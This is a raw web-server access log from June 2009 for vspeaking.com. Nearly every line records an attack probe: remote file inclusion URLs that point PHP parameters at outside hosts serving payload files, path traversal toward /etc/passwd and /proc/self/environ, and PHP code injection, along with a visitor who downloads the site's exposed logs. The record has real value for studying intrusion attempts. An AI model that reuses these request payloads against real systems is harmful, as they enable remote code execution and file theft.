83.13.191.186 - - [29/Jun/2009:06:02:26 -0700] "GET /logs/access_090413.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
216.17.99.13 - - [29/Jun/2009:06:02:41 -0700] "GET /administrator/components/com_jcs/views/list.sub.html.php?mosConfig_absolute_path=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.vspeaking.com"
216.17.99.13 - - [29/Jun/2009:06:02:41 -0700] "GET /logs/access.log/administrator/components/com_jcs/views/list.sub.html.php?mosConfig_absolute_path=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.vspeaking.com"
216.17.99.13 - - [29/Jun/2009:06:02:41 -0700] "GET /logs/administrator/components/com_jcs/views/list.sub.html.php?mosConfig_absolute_path=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.vspeaking.com"
216.17.99.13 - - [29/Jun/2009:06:02:41 -0700] "GET /logs/access.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.vspeaking.com"
216.17.99.13 - - [29/Jun/2009:06:02:42 -0700] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.vspeaking.com"
216.17.99.13 - - [29/Jun/2009:06:02:42 -0700] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.vspeaking.com"
193.201.52.162 - - [29/Jun/2009:06:02:48 -0700] "GET /logs//appserv/main.php?appserv_roothttp://stahlstadt.st.funpic.de/testN.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
193.201.52.162 - - [29/Jun/2009:06:02:49 -0700] "GET /logs//appserv/main.php?appserv_roothttp://stahlstadt.st.funpic.de/test99.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
193.201.52.162 - - [29/Jun/2009:06:02:49 -0700] "GET /appserv/main.php?appserv_roothttp://stahlstadt.st.funpic.de/testN.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
193.201.52.162 - - [29/Jun/2009:06:02:49 -0700] "GET /appserv/main.php?appserv_roothttp://stahlstadt.st.funpic.de/test99.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
83.13.191.186 - - [29/Jun/2009:06:03:55 -0700] "GET /logs/access_090413.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
209.68.2.99 - - [29/Jun/2009:06:06:08 -0700] "GET /index.php?_SERVER[DOCUMENT_ROOT]=http://www.aboutav.com//back/osiris.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
209.68.2.99 - - [29/Jun/2009:06:06:08 -0700] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://www.aboutav.com//back/osiris.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
150.214.108.8 - - [29/Jun/2009:06:06:33 -0700] "GET /?sourcedir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 200 779 "-" "libwww-perl/5.803" "vspeaking.com"
150.214.108.8 - - [29/Jun/2009:06:06:55 -0700] "GET /logs/?sourcedir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 200 2225 "-" "libwww-perl/5.803" "vspeaking.com"
150.214.108.8 - - [29/Jun/2009:06:07:10 -0700] "GET /logs/access.log/?sourcedir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "vspeaking.com"
163.20.160.14 - - [29/Jun/2009:06:11:42 -0700] "GET /logs/access.log%20%20//?path%5Bdocroot%5D=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "vspeaking.com"
163.20.160.14 - - [29/Jun/2009:06:11:42 -0700] "GET /?path%5Bdocroot%5D=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "vspeaking.com"
163.20.160.14 - - [29/Jun/2009:06:11:42 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.1" 200 2230 "-" "Mozilla/5.0" "vspeaking.com"
209.68.2.99 - - [29/Jun/2009:06:12:42 -0700] "GET /logs/access.log//index.php?_SERVER[DOCUMENT_ROOT]=http://www.aboutav.com//back/osiris.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
150.214.108.8 - - [29/Jun/2009:06:14:47 -0700] "GET /logs/access.log/?sourcedir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "vspeaking.com"
150.214.108.8 - - [29/Jun/2009:06:15:12 -0700] "GET /logs/?sourcedir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 200 2225 "-" "libwww-perl/5.803" "vspeaking.com"
150.214.108.8 - - [29/Jun/2009:06:15:53 -0700] "GET /?sourcedir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 200 779 "-" "libwww-perl/5.803" "vspeaking.com"
150.214.108.8 - - [29/Jun/2009:06:18:43 -0700] "GET /logs/?sourcedir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 200 2225 "-" "libwww-perl/5.803" "www.vspeaking.com"
150.214.108.8 - - [29/Jun/2009:06:18:43 -0700] "GET /?sourcedir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 200 779 "-" "libwww-perl/5.803" "www.vspeaking.com"
150.214.108.8 - - [29/Jun/2009:06:19:52 -0700] "GET /?sourcedir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 200 779 "-" "libwww-perl/5.803" "www.vspeaking.com"
150.214.108.8 - - [29/Jun/2009:06:20:21 -0700] "GET /logs/?sourcedir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 200 2225 "-" "libwww-perl/5.803" "www.vspeaking.com"
76.73.13.45 - - [29/Jun/2009:06:21:32 -0700] "GET /logs/access_090413.log//errors.php?error=http://www.orkydeavelenosa.altervista.org/riky/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
76.73.13.45 - - [29/Jun/2009:06:21:32 -0700] "GET /logs//errors.php?error=http://www.orkydeavelenosa.altervista.org/riky/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
76.73.13.45 - - [29/Jun/2009:06:21:32 -0700] "GET /errors.php?error=http://www.orkydeavelenosa.altervista.org/riky/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
70.86.9.234 - - [29/Jun/2009:06:22:23 -0700] "GET /logs//include/mail.inc.php?skin_board_path=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
70.86.9.234 - - [29/Jun/2009:06:22:23 -0700] "GET /include/mail.inc.php?skin_board_path=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
70.86.9.234 - - [29/Jun/2009:06:22:23 -0700] "GET /logs/access_090413.log//include/mail.inc.php?skin_board_path=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
210.220.213.203 - - [29/Jun/2009:06:25:57 -0700] "GET /logs/access.log/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.kodae.ms.kr///_private/feelcomz/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
210.220.213.203 - - [29/Jun/2009:06:25:57 -0700] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.kodae.ms.kr///_private/feelcomz/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
210.220.213.203 - - [29/Jun/2009:06:25:57 -0700] "GET /logs/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.kodae.ms.kr///_private/feelcomz/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
163.20.160.14 - - [29/Jun/2009:06:26:24 -0700] "GET /logs/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
163.20.160.14 - - [29/Jun/2009:06:26:24 -0700] "GET /administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
163.20.160.14 - - [29/Jun/2009:06:26:24 -0700] "GET /logs/access_090413.log/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
218.150.78.245 - - [29/Jun/2009:06:28:48 -0700] "GET /logs/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
218.150.78.245 - - [29/Jun/2009:06:28:48 -0700] "GET /logs/access_090413.log/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
218.150.78.245 - - [29/Jun/2009:06:28:48 -0700] "GET /administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
218.150.78.245 - - [29/Jun/2009:06:30:23 -0700] "GET /logs/access_090413.log/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
218.150.78.245 - - [29/Jun/2009:06:30:23 -0700] "GET /administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
218.150.78.245 - - [29/Jun/2009:06:30:24 -0700] "GET /logs/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
124.0.103.194 - - [29/Jun/2009:06:30:57 -0700] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.kodae.ms.kr///wiach/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
124.0.103.194 - - [29/Jun/2009:06:30:57 -0700] "GET /logs/access.log/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.kodae.ms.kr///wiach/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
124.0.103.194 - - [29/Jun/2009:06:30:57 -0700] "GET /logs/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.kodae.ms.kr///wiach/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
41.250.219.139 - - [29/Jun/2009:06:36:01 -0700] "GET /logs/access.log HTTP/1.1" 200 436192 "http://www.google.co.ma/search?hl=fr&client=firefox-a&rls=com.ubuntu%3Afr%3Aunofficial&hs=yOH&q=filetype%3Alog&btnG=Rechercher&meta=cr%3DcountryMA" "Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11" "www.vspeaking.com"
41.250.219.139 - - [29/Jun/2009:06:36:05 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11" "www.vspeaking.com"
41.250.219.139 - - [29/Jun/2009:06:36:08 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11" "www.vspeaking.com"
41.250.219.139 - - [29/Jun/2009:06:37:13 -0700] "GET /logs/?phpAds_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 2225 "-" "Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11" "www.vspeaking.com"
41.250.219.139 - - [29/Jun/2009:06:37:20 -0700] "GET /logs/scripts.log HTTP/1.1" 200 426500 "http://www.vspeaking.com/logs/?phpAds_path=../../../../../../../../../../../../../etc/passwd%00" "Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11" "www.vspeaking.com"
41.250.219.139 - - [29/Jun/2009:06:37:45 -0700] "GET /logs/access_090427.log HTTP/1.1" 200 2293760 "http://www.vspeaking.com/logs/?phpAds_path=../../../../../../../../../../../../../etc/passwd%00" "Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11" "www.vspeaking.com"
41.250.219.139 - - [29/Jun/2009:06:37:49 -0700] "GET /logs/?phpAds_path=../../../../../../../../etc/passwd HTTP/1.1" 200 2225 "-" "Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11" "www.vspeaking.com"
41.250.219.139 - - [29/Jun/2009:06:38:16 -0700] "GET /logs/?phpAds_path=../../../../../../../../../../../../../etc/passwd HTTP/1.1" 200 2225 "-" "Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11" "www.vspeaking.com"
41.250.219.139 - - [29/Jun/2009:06:38:25 -0700] "GET / HTTP/1.1" 200 779 "http://www.vspeaking.com/logs/?phpAds_path=../../../../../../../../../../../../../etc/passwd" "Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11" "www.vspeaking.com"
41.250.219.139 - - [29/Jun/2009:06:38:27 -0700] "GET /tmp/ HTTP/1.1" 200 520 "http://www.vspeaking.com/" "Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11" "www.vspeaking.com"
41.250.219.139 - - [29/Jun/2009:06:38:30 -0700] "GET / HTTP/1.1" 200 779 "http://www.vspeaking.com/tmp/" "Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11" "www.vspeaking.com"
41.250.219.139 - - [29/Jun/2009:06:38:31 -0700] "GET /logs/ HTTP/1.1" 200 2225 "http://www.vspeaking.com/" "Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11" "www.vspeaking.com"
41.250.219.139 - - [29/Jun/2009:06:39:05 -0700] "GET /logs/access_090601.log HTTP/1.1" 200 4449950 "http://www.vspeaking.com/logs/" "Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11" "www.vspeaking.com"
209.68.2.99 - - [29/Jun/2009:06:39:11 -0700] "GET /include/footer.php?_path[counter]=http://www.aboutav.com//back/osiris.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
209.68.2.99 - - [29/Jun/2009:06:39:11 -0700] "GET /logs/access.log//include/footer.php?_path[counter]=http://www.aboutav.com//back/osiris.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
209.68.2.99 - - [29/Jun/2009:06:39:11 -0700] "GET /logs//include/footer.php?_path[counter]=http://www.aboutav.com//back/osiris.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
76.73.13.45 - - [29/Jun/2009:06:40:01 -0700] "GET /logs/access_090413.log//errors.php?error=http://www.orkydeavelenosa.altervista.org/riky/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
76.73.13.45 - - [29/Jun/2009:06:40:01 -0700] "GET /errors.php?error=http://www.orkydeavelenosa.altervista.org/riky/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
76.73.13.45 - - [29/Jun/2009:06:40:01 -0700] "GET /logs//errors.php?error=http://www.orkydeavelenosa.altervista.org/riky/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
124.0.103.194 - - [29/Jun/2009:06:40:32 -0700] "GET /logs/access.log%20%20/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.kodae.ms.kr///wiach/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
70.86.9.234 - - [29/Jun/2009:06:41:43 -0700] "GET /include/mail.inc.php?skin_board_path=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
70.86.9.234 - - [29/Jun/2009:06:41:43 -0700] "GET /logs//include/mail.inc.php?skin_board_path=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
70.86.9.234 - - [29/Jun/2009:06:41:43 -0700] "GET /logs/access_090413.log//include/mail.inc.php?skin_board_path=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
89.186.1.54 - - [29/Jun/2009:06:42:15 -0700] "GET /logs//atom.php5?page=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.vspeaking.com"
89.186.1.54 - - [29/Jun/2009:06:42:15 -0700] "GET /atom.php5?page=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.vspeaking.com"
89.186.1.54 - - [29/Jun/2009:06:43:37 -0700] "GET /logs/access.log//atom.php5?page=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.vspeaking.com"
72.82.228.83 - - [29/Jun/2009:06:44:00 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://med.buu.ac.th//components/com_joomlaboard/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
72.82.228.83 - - [29/Jun/2009:06:44:00 -0700] "GET /logs/access.log%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://med.buu.ac.th//components/com_joomlaboard/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
72.82.228.83 - - [29/Jun/2009:06:44:00 -0700] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://med.buu.ac.th//components/com_joomlaboard/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
72.82.228.83 - - [29/Jun/2009:06:48:16 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
72.82.228.83 - - [29/Jun/2009:06:48:17 -0700] "GET /phphtml.php?htmlclass_path=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
72.82.228.83 - - [29/Jun/2009:06:48:17 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
72.82.228.83 - - [29/Jun/2009:06:52:19 -0700] "GET /logs/access.log%20%20/phphtml.php?htmlclass_path=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
72.82.228.83 - - [29/Jun/2009:06:52:19 -0700] "GET /phphtml.php?htmlclass_path=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
72.82.228.83 - - [29/Jun/2009:06:52:19 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
218.150.78.245 - - [29/Jun/2009:07:06:55 -0700] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 200 2231 "-" "Mozilla/5.0" "www.vspeaking.com"
218.150.78.245 - - [29/Jun/2009:07:06:55 -0700] "GET /logs/access.log///?_SERVER[DOCUMENT_ROOT]=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
218.150.78.245 - - [29/Jun/2009:07:06:55 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.vspeaking.com"
94.23.2.21 - - [29/Jun/2009:07:14:41 -0700] "GET /logs/access_090112.log//main.php?sayfa=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.vspeaking.com"
94.23.2.21 - - [29/Jun/2009:07:14:41 -0700] "GET /main.php?sayfa=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.vspeaking.com"
94.23.2.21 - - [29/Jun/2009:07:14:42 -0700] "GET /logs//main.php?sayfa=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.vspeaking.com"
89.188.129.126 - - [29/Jun/2009:07:15:23 -0700] "GET /logs/access.log//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
89.188.129.126 - - [29/Jun/2009:07:15:23 -0700] "GET /modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
89.188.129.126 - - [29/Jun/2009:07:15:23 -0700] "GET /logs//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
110.45.144.34 - - [29/Jun/2009:07:15:35 -0700] "GET /logs/access_090112.log//main.php?sayfa=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
110.45.144.34 - - [29/Jun/2009:07:15:35 -0700] "GET /main.php?sayfa=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
110.45.144.34 - - [29/Jun/2009:07:15:36 -0700] "GET /logs//main.php?sayfa=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
70.84.177.170 - - [29/Jun/2009:07:16:29 -0700] "GET /poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.haruuu.com/albanianid.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "vspeaking.com"
216.120.227.2 - - [29/Jun/2009:07:16:50 -0700] "GET /logs/access.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.natalie-coughlin.com/fan/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.vspeaking.com"
216.120.227.2 - - [29/Jun/2009:07:16:51 -0700] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.natalie-coughlin.com/fan/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.vspeaking.com"
216.120.227.2 - - [29/Jun/2009:07:16:51 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.natalie-coughlin.com/fan/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.vspeaking.com"
216.120.227.2 - - [29/Jun/2009:07:16:51 -0700] "GET /logs/access.log/errors.php?error=http://www.natalie-coughlin.com/fan/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.vspeaking.com"
216.120.227.2 - - [29/Jun/2009:07:16:51 -0700] "GET /logs/access.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.vspeaking.com"
216.120.227.2 - - [29/Jun/2009:07:16:51 -0700] "GET /errors.php?error=http://www.natalie-coughlin.com/fan/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.vspeaking.com"
216.120.227.2 - - [29/Jun/2009:07:16:51 -0700] "GET /logs/errors.php?error=http://www.natalie-coughlin.com/fan/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.vspeaking.com"
216.120.227.2 - - [29/Jun/2009:07:16:51 -0700] "GET /logs/access.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.vspeaking.com"
216.120.227.2 - - [29/Jun/2009:07:16:51 -0700] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.vspeaking.com"
216.120.227.2 - - [29/Jun/2009:07:16:51 -0700] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.vspeaking.com"
216.120.227.2 - - [29/Jun/2009:07:16:51 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.vspeaking.com"
216.120.227.2 - - [29/Jun/2009:07:16:51 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.vspeaking.com"
72.82.228.83 - - [29/Jun/2009:07:16:58 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
110.45.144.33 - - [29/Jun/2009:07:18:22 -0700] "GET /logs/access_090112.log//main.php?sayfa=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
110.45.144.33 - - [29/Jun/2009:07:18:23 -0700] "GET /main.php?sayfa=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
